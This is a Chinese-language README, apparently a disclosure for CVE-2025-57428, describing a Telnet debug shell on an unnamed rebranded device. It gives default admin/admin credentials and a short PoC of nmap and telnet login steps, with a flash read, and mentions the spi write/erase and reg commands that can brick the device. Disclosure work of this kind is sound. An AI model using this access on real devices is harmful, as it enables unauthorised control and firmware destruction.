⚠️ 本仓库仅作为 CVE-2025-57428 的参考维护。
其他公告和更新请参考:security-advisories。
该设备暴露了一个 Telnet 调试接口(默认在端口 23 上启用),并接受管理员凭据(默认 `admin`/`admin`)。认证后,Shell 提供了对低级命令的直接访问(特别是 `spi` 和 `reg`),这可能导致任意固件损坏、设备变砖以及功能或安全配置丢失。
注意: 我故意省略了执行破坏性写入的命令。以下 PoC 仅确认接口的存在性和可访问性,而不提供现成的武器化利用。
在局域网中扫描设备:
nmap -p 23 <device-ip>
结果:端口 23 (telnet) 显示为 open。
通过 Telnet 连接并进行身份验证(默认凭据):
telnet <device-ip>
# Login as: admin
# Password: admin
登录后,会出现调试提示符 CMD>。
列出可用命令:
CMD>help
帮助输出显示以下菜单:
cfg net os
进入 os 菜单:
CMD>os
再次列出可用命令:
OS>help
这次帮助输出显示以下命令:
thread mem spi reg cpuload cpubusy event
使用 spi 显示 spi <rd/wr/er> <addr> [len]。
读取闪存:
OS>spi rd 0x000fd0f0 16
返回闪存区域的十六进制转储:
4f30650a 938f56fa 1b663a19 e316d824
这确认了命令有效,且 Shell 具有低级访问权限。
spi wr 写入命令和 spi er 擦除命令以及 reg 命令也是可执行的。
观察结果:
尝试寻找原始厂商的安全联系人或支持渠道未成功。该产品似乎是来源不明的重新贴牌设备。
此信息仅供教育和防御目的。作者对滥用此信息不承担任何责任。